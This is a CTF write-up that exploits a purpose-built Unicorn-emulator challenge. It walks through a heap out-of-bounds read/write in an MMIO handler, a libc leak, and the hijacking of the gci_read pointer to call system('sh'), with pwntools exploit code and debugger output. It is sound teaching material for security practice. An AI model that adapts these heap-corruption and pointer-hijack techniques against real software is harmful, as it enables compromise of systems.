(Pwn - Root-Xmas Challenge 2024) - Day 23 - Gift Control Interface
TL;DR: Unicorn sandbox escape, heap out-of-bounds read/write in MMIO interface.
This challenge was part of the Root-Xmas Challenge which was organized by Root-Me. This event was an Advent Calendar made with CTF challenges.
Description:
This year, to easily handle people’s Christmas lists, the elves teamed up to develop a cutting-edge application: the Gift Control Interface.
Try it out and maybe you’ll get a flag from Santa Claus!
Introduction
There is quite a bunch of given files for this challenge.
$ tree
.
├── bin
│ ├── gci
├── docker
│ ├── docker-compose.yml
│ ├── Dockerfile
│ └── flag.txt
└── src
├── bin
│ └── gci
├── emu.c
├── gci.c
├── include
│ ├── emu.h
│ ├── gci.h
│ └── unicorn
│ ├── arm64.h
│ ├── [...] (unicorn stuff, not interesting)
│ └── x86.h
├── lib
│ ├── libunicorn.so
│ └── libunicorn.so.2
├── main.c
├── Makefile
└── obj
This challenge uses libc 2.39 and all protections are enabled.
$ checksec --file=gci
RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Fortified Fortifiable FILE
Full RELRO Canary found NX enabled PIE enabled No RPATH No RUNPATH 65 Symbols No 0 3 gci
The code of the challenge is located in
src/main.c
, src/emu.c
, src/gci.c
and their .h
header
files. Let’s take a look at them.
First of all, main.c
is the entry point of the challenge. It reads
some code in input from stdin
, and launch the emulation of this
code by calling emu_launch
(which is defined in emu.c
).
#include <stdio.h>
#include <stdlib.h>
#include "emu.h"
void __attribute__((constructor)) setup(void)
{
setvbuf(stdout, NULL, _IONBF, 0);
setvbuf(stdin, NULL, _IONBF, 0);
}
static size_t read_long(void)
{
char buf[0x20] = { 0 };
fgets(buf, sizeof(buf) - 1, stdin);
return strtoul(buf, NULL, 10);
}
int main(int argc, char *argv[]) {
printf("Ho ho ho! Welcome to the GCI (Gift Control Interface)\n");
printf("You can write your gift list here and I will execute it for you\n");
printf("Code length (%d max): ", CODE_SIZE);
size_t code_len = read_long();
void *code = malloc(code_len);
if (!code) {
fputs("Failed to allocate memory\n", stderr);
return 1;
}
printf("Enter your code: ");
fread(code, 1, code_len, stdin);
printf("Executing your code...\n");
return emu_launch(code, code_len);
}
The emulator is defined in emu.c
. It first maps memory for the stack
and sets rsp
to its bottom. Then, it maps memory for the code and
copy the input code there. More surprisingly, it setups a MMIO
interface for memory area at GCI_START
(defined as 0xcafe0000
in
emu.h
). Finally, the emulation can start.
#include <unicorn/unicorn.h>
#include <emu.h>
#include <gci.h>
static bool emu_init(uc_engine **uc, void *code, size_t code_len)
{
uc_engine *_uc;
uc_err err;
if ((err = uc_open(UC_ARCH_X86, UC_MODE_64, &_uc)) != UC_ERR_OK) {
*uc = NULL;
return false;
}
// Map stack
uc_mem_map(_uc, STACK_START, STACK_SIZE, UC_PROT_READ | UC_PROT_WRITE);
uc_reg_write(_uc, UC_X86_REG_RSP, &(uint64_t) { STACK_START + STACK_SIZE });
// Map code
uc_mem_map(_uc, CODE_START, CODE_SIZE, UC_PROT_ALL);
uc_mem_write(_uc, CODE_START, code, code_len);
// Setup MMIO
uc_mmio_map(_uc, GCI_START, PAGE_SIZE, gci_read, NULL, gci_write, NULL);
*uc = _uc;
return true;
}
int emu_launch(void *code, size_t code_len)
{
uc_engine *uc = NULL;
uc_err err;
if (!emu_init(&uc, code, code_len)) {
return 1;
}
free(code);
err = uc_emu_start(uc, CODE_START, CODE_START + code_len, 0, 0);
return 0;
}
But, what is a MMIO (Memory Mapped I/O) interface?
It allows to perform reads/writes on some device by reading/writing at
some given memory mapping, in the same address space as the rest of
the memory. Basically, when one does a memory read such as mov rdi,
0xcafe0042 ; mov rax, qword ptr [rdi]
, it will call the read
function of the device, with some parameter equal to 0x42, and the
result will be stored in rax
. Similarly, we can write data to the
device.
Here, the device inputs/outputs are handled by gci_read
and
gci_write
functions that are defined in gci.c
.
Finally, the core logic is in gci.c
:
#include <gci.h>
#include <unicorn/unicorn.h>
static gci_context gci_ctx;
static void gci_handle_command(uc_engine *uc, uint64_t command)
{
switch (command) {
case GCI_CMD_INIT:
if (gci_ctx.gift_list)
free(gci_ctx.gift_list);
gci_ctx.gift_list = malloc(gci_ctx.gift_max * sizeof(gift));
gci_ctx.gift_count = 0;
break;
case GCI_CMD_ADD_GIFT:
if (gci_ctx.gift_list && gci_ctx.gift_count < gci_ctx.gift_max) {
gci_ctx.gift_list[gci_ctx.gift_count++] = gci_ctx.gift_to_add;
}
break;
case GCI_CMD_GET_GIFT:
if (gci_ctx.gift_list && gci_ctx.gift_idx < gci_ctx.gift_max) {
gci_ctx.gift_to_get = gci_ctx.gift_list[gci_ctx.gift_idx];
}
break;
case GCI_CMD_EDIT_GIFT:
if (gci_ctx.gift_list && gci_ctx.gift_idx < gci_ctx.gift_max) {
gci_ctx.gift_list[gci_ctx.gift_idx] = gci_ctx.gift_to_add;
}
break;
case GCI_CMD_SUBMIT:
if (gci_ctx.gift_list == NULL || gci_ctx.gift_count == 0)
break;
printf("Your gift list has been submitted to santa !\n");
printf("Gifts:\n");
for (size_t i = 0; i < gci_ctx.gift_count; i++) {
printf("#%lu: %#x\n", i, gci_ctx.gift_list[i]);
}
uc_emu_stop(uc);
break;
default:
break;
}
}
uint64_t gci_read(uc_engine *uc, uint64_t offset, unsigned size, void *user_data)
{
switch (offset) {
case GCI_CTRL_GIFT:
return gci_ctx.gift_to_get;
case GCI_CTRL_GIFT_MAX:
return gci_ctx.gift_max;
case GCI_CTRL_GIFT_IDX:
return gci_ctx.gift_idx;
case GCI_CTRL_CMD:
default:
return 0;
}
}
void gci_write(uc_engine *uc, uint64_t offset, unsigned size, uint64_t value, void *user_data)
{
switch (offset) {
case GCI_CTRL_GIFT:
gci_ctx.gift_to_add = value;
break;
case GCI_CTRL_GIFT_MAX:
gci_ctx.gift_max = value;
break;
case GCI_CTRL_GIFT_IDX:
gci_ctx.gift_idx = value;
break;
case GCI_CTRL_CMD:
gci_handle_command(uc, value);
break;
default:
break;
}
}
The behavior of reads/writes through the MMIO only depends on the
offset and, for writes, the value written. The size of read/written
data is irrelevant, as well as the extra parameter user_data
(which will always be NULL here according to the source code of uc_mmio_map
).
I/O Commands
gci_read
and gci_write
both manipulate a global gci_context
which is defined as follows in gci.h
:
typedef struct gci_context
{
size_t gift_count;
size_t gift_max;
size_t gift_idx;
gift *gift_list;
gift gift_to_get;
gift gift_to_add;
} gci_context;
where gift
is an alias for uint32_t
.
gift_to_add
, gift_max
and gift_idx
can be arbitrarily set by
doing MMIO writes respectively at offsets GCI_CTRL_GIFT
(defined as
0 in gci.h
), GCI_CTRL_GIFT_MAX
(= 8) and GCI_CTRL_GIFT_IDX
(=
16). Similarly, gift_to_add
, gift_max
and gift_idx
can be read
with MMIO reads. Finally, writing to GCI_CTRL_CMD
allows to execute
a “command” corresponding to the value written.
The possible commands are:
- Initialize a gift list with size
gift_max
, - Append
gift_to_add
to the end of the list (indexgift_count
), - Get the gift at index
gift_idx
- Edit the gift at index
gift_idx
- Submit the list and stop the emulation.
The Vulnerability
My first thought was: when we get/edit a gift (commands
GCI_CMD_GET_GIFT
and GCI_CMD_EDIT_GIFT
), there is a check to avoid
reading at an index greater than gift_max
, but no checks that the
index is positive.
I just forgot that gift_idx
has type size_t
, which is unsigned. :’)
However, there is still a real vulnerability: the list is initialized
by allocating a chunk of size gift_max * sizeof(gift)
. But
gift_max
can be modified arbitrarily after allocation! Thus, the
check in get_gift
is insufficient since we can set gift_max
to a
very big value and read/write out-of-bounds of the allocated chunk.
As a result, we have a heap out-of-bounds read/write primitive.
It’s now time to look for targets in the heap.
The Target
A few weeks before the CTF, I heard about a simple QEMU escape challenge through an out-of-bounds access in a MMIO interface at SECCON CTF 13 Quals. Since I had never done that before and I was curious to see to what a sandbox escape could be like, I read this write-up by Chovid99.
The present challenge reminded me of this write-up. It gave me the
idea to overwrite the pointer to gci_read
in the MMIO structure, in
case it was stored in the heap. And… it turns out we are lucky.
gef> print gci_read
$2 = {<text variable, no debug info>} 0x5640734938d9 <gci_read>
gef> find 0x5640734938d9
[+] Searching '\xd9\x38\x49\x73\x40\x56' in whole memory
[+] In '[heap]' (0x5640774f2000-0x5640775a3000 [rw-])
0x5640774f7450: d9 38 49 73 40 56 00 00 00 00 00 00 00 00 00 00 | .8Is@V.......... |
As a result, we can use the heap out-of-bounds write to overwrite this
pointer and control rip
. But the road to the flag is far from being ended.
Indeed, we have two main limitations:
- To overwrite the pointer with
@system
or a one gadget, we have to leak the libc base address, - We do not control the value of
rdi
when controlling the instruction pointer: it always points to theuc_engine
structure, the first argument ofgci_read
.
Libc Leak
A common idea to leak a pointer to libc in the head is to find a chunk
in the unsorted bin, where fd
and bk
pointers are libc pointers
(to main_arena
). Here, we are lucky again:
pwndbg> bins
tcachebins
0x30 [ 5]: 0x5576a3a7f030 —▸ 0x5576a3a9b250 —▸ 0x5576a3a9af90 —▸ 0x5576a3a7e640 —▸ [...]
0x410 [ 2]: 0x5576a3a7e180 —▸ 0x5576a3a7e940 ◂— 0
fastbins
empty
unsortedbin
all: 0x5576a3ad9610 —▸ 0x7f1deca03b20 (main_arena+96) ◂— 0x5576a3ad9610
smallbins
empty
largebins
0x6c0-0x6f0: 0x5576a3a87690 —▸ 0x7f1deca03fc0 (main_arena+1280) ◂— 0x5576a3a87690
0xe00-0xff0: 0x5576a3acdf10 —▸ 0x7f1deca04130 (main_arena+1648) ◂— 0x5576a3acdf10
pwndbg> x/4gx 0x5576a3ad9610
0x5576a3ad9610: 0x0000000000000000 0x0000000000017001
0x5576a3ad9620: 0x00007f1deca03b20 0x00007f1deca03b20
By reading out-of-bounds at the correct offset, we get a pointer to
libc. However, it is not very convenient since the leak is stored in a
register of the emulated program. Moreover we can only read data 4
bytes by 4 bytes. We first store the 4 first bytes to rax
, copy them
to rbx
, shift them 4 bytes left in rbx
, read the 4 next bytes to
rax
and finally add rbx
to rax
.
A quick win would have been to use a one gadget (thus not requiring to control any registers) but unfortunately, the requirements on registers/stack to use one gadgets were not met here. How frustrating it was. :(
By substracting the right offset to rax
, we can get the address of
system
in rax
and overwrite the pointer to gci_read
with it
though.
Actually “Controlling” rdi
What struck me in my despair is that the uc_engine
structure is
actually stored… in the heap!
RAX 0x55a5fd8b2450 —▸ 0x55a5f65d38d9 (gci_read) ◂— endbr64
[...]
RDX 4
RDI 0x55a5fd8ad4d0 ◂— 0x800000004 <------ In the heap!
RSI 0xc
[...]
RIP 0x55a5f65d3939 (gci_write+8) ◂— sub rsp, 0x30
─
Therefore, if we manage to allocate the gift list before the structure and overwrite the first bytes of the structure with “sh” (with the OOB write) without making everything crash, it would be good!
It’s dirty, very dirty. But it turns out that it actually works. I
would be curious to know what’s the purpose of the first bytes of the
uc_engine
structure.
Luckily for us, after the code is copied from user input, its buffer
is freed. Thus we have a chunk in tcache we can use to allocate our
gift list before the uc_engine
structure.
0x55a5fd8ad290 0x0000000000000000 0x0000000000000231 ........1.......
0x55a5fd8ad2a0 0x000000055a5fd8ad 0x00c76ed1283822c8 .._Z....."8(.n.. <-- tcachebins[0x230][0/1]
0x55a5fd8ad2b0 0x0018bf4817894800 0xc74800000000cafe .H..H.........H.
0x55a5fd8ad2c0 0x17894800001337c2 0x0000cafe0008bf48 .7...H..H.......
[...]
0x55a5fd8ad4b0 0xfe0008bf48178948 0x078b4800000000ca H..H.........H..
0x55a5fd8ad4c0 0x0000000000000000 0x0000000000003a31 ........1:......
0x55a5fd8ad4d0 0x0000000800000004 0x0000000000000000 ................ <---- uc_engine structure
0x55a5fd8ad4e0 0x000055a5fd8b0f40 0x000055a5fd8b25a0 @....U...%...U..
We have however to allocate a gift list with length such that malloc
will use the tcache chunk. For convenience, we instead allocate a gift
list with fixed size and add padding to the input code to match both
lengths.
The Exploit
For convenience, I wrote wrapper functions in Python to do operations
on the MMIO interface. For instance to set gift_idx
, read the
gift at this index and store it in rax
:
def set_gift_idx(gift_idx):
payload = 'mov rdi, %d ;\n' % (GCI_START + GCI_CTRL_GIFT_IDX)
payload += 'mov rdx, %d ;\n' % gift_idx
payload += 'mov qword ptr [rdi], rdx ;\n'
return payload
def get_gift():
payload = 'mov rdi, %d ;\n' % (GCI_START + GCI_CTRL_CMD)
payload += 'mov rdx, %d ;\n' % GCI_CMD_GET_GIFT
payload += 'mov qword ptr [rdi], rdx ;\n'
return payload
def get_gift_to_get():
payload = 'mov rdi, %d ;\n' % (GCI_START + GCI_CTRL_GIFT)
payload += 'mov rax, qword ptr [rdi] ;\n'
return payload
finally, to read 4 bytes at offset i
and store them in rax
,
def get4(i):
payload = set_gift_idx(i)
payload += get_gift()
payload += get_gift_to_get()
return payload
All the assembly instructions of the payloads are concatenated at the
end and assembled using the asm
pwntools function.
This is the main part of my exploit. The full code is available here
def main():
io = start()
[...]
code = set_gift_max(150)
code += init_gift_list()
code += set_gift_max((1<<64) - 1) # allows OOB access
code += set_gift_to_add(0xcafebabe)
code += add_gift()
code += set4(152, 0x6873) # overwrite the first bytes of uc_engine with "sh"
code += get8(97516) # ptr to libc (main arena)
code += 'sub rax, 0x1ab3e0 ;\n' # @system
code += set8_val_rax(5240) # overwrite pointer to gci_read
code += get_gift_max() # trigger a read
# print(code)
code = asm(code)
code += b'A' * (150*4 - len(code)) # padding to allocate gift list in tcache chunk
io.sendlineafter(b'Code length (16384 max): ', str(len(code)).encode())
io.sendafter(b'Enter your code: ', code)
io.interactive()
$ python solve.py
[...]
[+] Opening connection to dyn-01.xmas.root-me.org on port 20690: Done
[*] Switching to interactive mode
Executing your code...
$ ls
flag.txt
gci
$ cat flag.txt
RM{Deer_s4nta_1_w4nt_4_Un1c0rn!}
FLAG: RM{Deer_s4nta_1_w4nt_4_Un1c0rn!}
Conclusion and Intended Solution
Kudos to voydstack for this great challenge. I had never done in practice a sandbox escape before, and this challenge was a very good introduction to this kind of sorcery.
We discussed the challenge after I solved it, and there was a way cleaner solution.
I noticed earlier while solving the challenge that there was a RWX-mapped page (actually used by Unicorn’s JIT) but I haven’t found how to take profit from it.
pwndbg> vmmap
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
Start End Perm Size Offset File
0x55fde7a9b000 0x55fde7a9c000 r--p 1000 0 /data/rlaspina/Documents/00-CTF/00-CTF/2024/xmas_rootme/23-gift_control_interface/bin/gci_patched
0x55fde7a9c000 0x55fde7a9d000 r-xp 1000 1000 /data/rlaspina/Documents/00-CTF/00-CTF/2024/xmas_rootme/23-gift_control_interface/bin/gci_patched
[...]
0x7f3d6d610000 0x7f3d6d611000 ---p 1000 0 [anon_7f3d6d610]
0x7f3d6da00000 0x7f3dad9ff000 rwxp 3ffff000 0 [anon_7f3d6da00] <--- HERE !
0x7f3dad9ff000 0x7f3dada00000 ---p 1000 0 [anon_7f3dad9ff]
[...]
0x7f3daddff000 0x7f3dade03000 r--p 4000 1fe000 /data/rlaspina/Documents/00-CTF/00-CTF/2024/xmas_rootme/23-gift_control_interface/bin/libc.so.6
0x7f3dade03000 0x7f3dade05000 rw-p 2000 202000 /data/rlaspina/Documents/00-CTF/00-CTF/2024/xmas_rootme/23-gift_control_interface/bin/libc.so.6
OOB write to uc_engine
structure was intended, but instead we could
have overwritten the pointer to the area where the emulated stack is
mapped to remap it to the RWX area. We can then write a shellcode
there by executing push
instructions in the emulated code (the
RWX-area actually becomes our new “stack”). Finally we overwrite the
pointer to gci_read
as we have done with the address of the
shellcode.
A lot more nice-looking, but a flag is a flag… :)